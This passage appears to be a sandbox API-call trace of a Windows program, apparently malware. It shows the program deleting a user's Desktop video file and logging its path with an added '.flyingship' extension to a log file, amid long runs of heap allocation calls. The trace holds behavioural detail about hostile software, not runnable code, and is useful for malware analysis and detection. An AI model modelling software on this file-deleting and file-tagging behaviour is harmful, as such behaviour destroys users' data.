dwFlags=0x0, lpMem=0x76e708 | out: hHeap=0x650000) returned 1 [0075.108] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0075.108] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e618 | out: hHeap=0x650000) returned 1 [0075.108] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e630 | out: hHeap=0x650000) returned 1 [0075.108] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0075.108] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e708 | out: hHeap=0x650000) returned 1 [0075.108] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e300 | out: hHeap=0x650000) returned 1 [0075.108] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0075.108] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e630 | out: hHeap=0x650000) returned 1 [0075.108] FreeLibrary (hLibModule=0x76d30000) returned 1 [0075.108] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0075.108] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.108] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.108] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb398 | out: hHeap=0x650000) returned 1 [0075.109] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0075.109] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de28 | out: hHeap=0x650000) returned 1 [0075.109] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e378 | out: hHeap=0x650000) returned 1 [0075.109] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb598 | out: hHeap=0x650000) returned 1 [0075.109] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3f0 | out: hHeap=0x650000) returned 1 [0075.109] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e060 | out: hHeap=0x650000) returned 1 [0075.109] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e150 | out: hHeap=0x650000) returned 1 [0075.109] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6f0 | out: hHeap=0x650000) returned 1 [0075.109] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0075.109] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e600 | out: hHeap=0x650000) returned 1 [0075.109] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.109] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.109] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.109] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.109] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0075.109] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.109] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.109] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0075.110] FreeLibrary (hLibModule=0x76d30000) returned 1 [0075.111] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.111] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.111] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.111] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flv", nBufferLength=0x7fff, lpBuffer=0x60ea80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flv", lpFilePart=0x0) returned 0x49 [0075.111] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flv", lpFindFileData=0x61eac8 | out: lpFindFileData=0x61eac8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa554300, ftCreationTime.dwHighDateTime=0x1d5e54b, ftLastAccessTime.dwLowDateTime=0xd5e4b850, ftLastAccessTime.dwHighDateTime=0x1d5e3e5, ftLastWriteTime.dwLowDateTime=0xc98b11c0, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0x329b, dwReserved0=0x63f910, dwReserved1=0x77cb1ecd, cFileName="BhG Xz5NyPYF_.flv", cAlternateFileName="BHGXZ5~1.FLV")) returned 0x6b89f8 [0075.111] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-bwohngaeohzwnbtd\\bhg xz5nypyf_.flv")) returned 1 [0075.114] FindNextFileW (in: hFindFile=0x6b89f8, lpFindFileData=0x61eac8 | out: lpFindFileData=0x61eac8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa554300, ftCreationTime.dwHighDateTime=0x1d5e54b, ftLastAccessTime.dwLowDateTime=0xd5e4b850, ftLastAccessTime.dwHighDateTime=0x1d5e3e5, ftLastWriteTime.dwLowDateTime=0xc98b11c0, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0x329b, dwReserved0=0x63f910, dwReserved1=0x77cb1ecd, cFileName="BhG Xz5NyPYF_.flv", cAlternateFileName="BHGXZ5~1.FLV")) returned 0 [0075.114] FindClose (in: hFindFile=0x6b89f8 | out: hFindFile=0x6b89f8) returned 1 [0075.114] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.115] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.115] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0075.115] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0075.115] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.115] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.115] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="flv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.115] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".flv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0075.115] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0075.115] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0075.115] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0075.115] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0075.116] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0075.116] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.116] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eedc | out: lpNewFilePointer=0x0) returned 1 [0075.116] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.116] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eebc | out: lpNewFilePointer=0x0) returned 1 [0075.116] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690940 [0075.116] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10000) returned 0x781ff0 [0075.116] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690810 [0075.117] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eecc | out: lpNewFilePointer=0x0) returned 1 [0075.117] ReadFile (in: hFile=0x140, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61eef4, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61eef4*=0x49, lpOverlapped=0x0) returned 1 [0075.117] ReadFile (in: hFile=0x140, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61eef4, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61eef4*=0x0, lpOverlapped=0x0) returned 1 [0075.117] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x49, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.117] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eebc | out: lpNewFilePointer=0x0) returned 1 [0075.117] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0075.117] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x781ff0 | out: hHeap=0x650000) returned 1 [0075.118] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab98 [0075.118] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690810 [0075.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv\r\n", cchWideChar=87, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 87 [0075.118] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x57) returned 0x674c58 [0075.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv\r\n", cchWideChar=87, lpMultiByteStr=0x674c58, cbMultiByte=87, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv\r\n", lpUsedDefaultChar=0x0) returned 87 [0075.118] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0075.118] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x60) returned 0x75b7b8 [0075.118] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x674c58 | out: hHeap=0x650000) returned 1 [0075.118] WriteFile (in: hFile=0x140, lpBuffer=0x75b7b8*, nNumberOfBytesToWrite=0x56, lpNumberOfBytesWritten=0x61eef4, lpOverlapped=0x0 | out: lpBuffer=0x75b7b8*, lpNumberOfBytesWritten=0x61eef4*=0x56, lpOverlapped=0x0) returned 1 [0075.118] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x75b7b8 | out: hHeap=0x650000) returned 1 [0075.118] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0075.118] CloseHandle (hObject=0x140) returned 1 [0075.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae68 | out: hHeap=0x650000) returned 1 [0075.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0075.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x771fe8 | out: hHeap=0x650000) returned 1 [0075.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b89f8 | out: hHeap=0x650000) returned 1 [0075.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b420 | out: hHeap=0x650000) returned 1 [0075.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0075.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e450 | out: hHeap=0x650000) returned 1 [0075.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df40 | out: hHeap=0x650000) returned 1 [0075.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a0b20 | out: hHeap=0x650000) returned 1 [0075.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0075.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad18 | out: hHeap=0x650000) returned 1 [0075.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0d8 | out: hHeap=0x650000) returned 1 [0075.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d9c8 | out: hHeap=0x650000) returned 1 [0075.119] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b89b8 | out: hHeap=0x650000) returned 1 [0075.119] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b540 | out: hHeap=0x650000) returned 1 [0075.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0075.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d630 | out: hHeap=0x650000) returned 1 [0075.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0075.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d068 | out: hHeap=0x650000) returned 1 [0075.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x699838 | out: hHeap=0x650000) returned 1 [0075.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0075.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aee0 | out: hHeap=0x650000) returned 1 [0075.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0075.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1b0 | out: hHeap=0x650000) returned 1 [0075.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0075.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d838 | out: hHeap=0x650000) returned 1 [0075.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aa30 | out: hHeap=0x650000) returned 1 [0075.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6a8 | out: hHeap=0x650000) returned 1 [0075.120] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0075.120] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6f8 | out: hHeap=0x650000) returned 1 [0075.120] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afe8 | out: hHeap=0x650000) returned 1 [0075.120] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab50 | out: hHeap=0x650000) returned 1 [0075.120] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d860 | out: hHeap=0x650000) returned 1 [0075.120] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.120] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d770 | out: hHeap=0x650000) returned 1 [0075.120] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afd0 | out: hHeap=0x650000) returned 1 [0075.120] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abf8 | out: hHeap=0x650000) returned 1 [0075.120] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acb8 | out: hHeap=0x650000) returned 1 [0075.120] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908d0 | out: hHeap=0x650000) returned 1 [0075.120] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d748 | out: hHeap=0x650000) returned 1 [0075.120] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad60 | out: hHeap=0x650000) returned 1 [0075.120] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0075.120] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac70 | out: hHeap=0x650000) returned 1 [0075.120] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b000 | out: hHeap=0x650000) returned 1 [0075.120] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0075.120] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690900 | out: hHeap=0x650000) returned 1 [0075.120] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d680 | out: hHeap=0x650000) returned 1 [0075.120] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e000 | out: hHeap=0x650000) returned 1 [0075.120] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690740 | out: hHeap=0x650000) returned 1 [0075.120] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d7c0 | out: hHeap=0x650000) returned 1 [0075.120] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5d0 | out: hHeap=0x650000) returned 1 [0075.120] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad78 | out: hHeap=0x650000) returned 1 [0075.120] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d888 | out: hHeap=0x650000) returned 1 [0075.120] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0075.120] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8978 | out: hHeap=0x650000) returned 1 [0075.120] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0075.120] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0075.120] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690740 [0075.120] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690900 [0075.120] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d888 [0075.120] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0075.120] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d888 | out: hHeap=0x650000) returned 1 [0075.120] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690900 | out: hHeap=0x650000) returned 1 [0075.120] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d888 [0075.121] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690900 [0075.121] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d7c0 [0075.121] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad78 [0075.121] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690980 [0075.121] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908d0 [0075.121] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908d0 | out: hHeap=0x650000) returned 1 [0075.121] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5d0 [0075.121] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0075.121] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e000 [0075.121] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d680 [0075.121] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b000 [0075.121] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690980 [0075.121] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac70 [0075.121] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad60 [0075.121] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b540 [0075.121] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0075.121] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908d0 [0075.121] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0075.121] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acb8 [0075.121] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690790 [0075.121] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abf8 [0075.121] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.121] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afd0 [0075.121] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690790 [0075.121] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab50 [0075.122] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.122] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afe8 [0075.122] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690790 [0075.122] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aa30 [0075.122] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.122] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1b0 [0075.122] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690790 [0075.122] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac10 [0075.122] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.122] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aee0 [0075.122] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690790 [0075.122] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0075.122] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.122] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0d8 [0075.122] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690790 [0075.122] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad18 [0075.122] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.122] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df40 [0075.122] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690790 [0075.122] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d748 [0075.122] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e450 [0075.122] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908e0 [0075.122] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0075.122] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae68 [0075.122] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908e0 [0075.123] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0075.123] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e450 | out: hHeap=0x650000) returned 1 [0075.123] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae68 | out: hHeap=0x650000) returned 1 [0075.123] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d748 | out: hHeap=0x650000) returned 1 [0075.123] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.123] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae68 [0075.123] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690790 [0075.123] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e450 [0075.123] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.123] RtlAllocateHeap 